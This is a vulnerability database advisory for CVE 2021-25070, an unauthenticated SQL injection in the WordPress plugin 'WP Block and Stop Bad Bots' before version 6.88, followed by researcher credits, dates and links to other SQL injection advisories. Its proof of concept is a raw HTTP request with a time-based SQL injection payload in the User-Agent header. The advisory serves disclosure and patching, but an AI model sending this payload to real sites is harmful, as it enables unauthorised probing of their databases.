WP Block and Stop Bad Bots < 6.88 – Unauthenticated SQLi | CVE 2021-25070 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape the User Agent before using it in a SQL statement to record logs, leading to an SQL Injection issue

Proof of Concept

GET / HTTP/1.1
User-Agent: \'+SLEEP(5))-- g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Affects Plugins

Fixed in 6.88

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

e00b2946-15e5-4458-9b13-2e272630a36f

Timeline

Publicly Published

2022-03-08 (about 3 years ago)

Added

2022-03-07 (about 3 years ago)

Last Updated

2022-04-09 (about 3 years ago)

Other

Published

Title

Published

2021-01-28

Title

uListing < 1.7 - Unauthenticated SQL Injections

Published

2017-04-24

Title

Cforms & CformsII < 14.13 - SQL Injection

Published

2013-02-03

Title

Newsletter < 3.0.9 - SQL Injection

Published

2025-10-21

Title

Email Tracker < 5.3.16 - Authenticated (Admin+) SQL Injection

Published

2015-07-07

Title

Pinpoint Booking System <= 2.0 - Authenticated Blind SQL Injection